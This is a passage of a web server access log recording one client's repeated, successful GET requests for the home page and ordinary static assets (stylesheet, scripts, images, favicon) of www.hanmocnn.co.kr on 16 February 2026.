AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:06:49 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:06:49 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:06:49 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 17486] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:06:49 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:06:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:16:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 9735] [Gzip 5.08] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:00:16:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:16:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:16:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:16:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:16:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:16:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 17486] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:16:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:16:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:22:21 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 9754] [Gzip 5.08] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:00:22:21 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:22:21 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:22:22 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:22:22 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:22:22 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:22:22 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 17486] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:22:22 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:22:22 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:23:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 9762] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:00:23:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:23:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:23:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:23:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:23:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:23:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 17486] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:23:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:23:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:24:06 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 9760] [Gzip 5.06] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:00:24:06 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:24:06 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:24:06 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:24:06 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:24:06 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:24:06 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 17486] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:24:06 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:24:06 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:24:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 9735] [Gzip 5.08] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:00:24:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:24:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:24:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:24:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:24:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:24:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 17486] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:24:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:24:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:25:16 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 9738] [Gzip 5.08] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:00:25:16 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:25:16 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:25:16 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:25:16 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:25:16 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:25:16 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 17486] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:25:16 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:25:16 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:25:26 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 9736] [Gzip 5.08] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:00:25:26 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:25:26 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:25:26 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:25:26 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:25:26 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:25:26 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 17486] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:25:26 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:25:27 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:44:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 9736] [Gzip 5.08] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:00:44:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:44:43 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:44:43 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:44:43 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:44:43 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:44:43 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 17647] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:44:43 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:44:43 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:45:17 +0000] - 200 200 - GET https 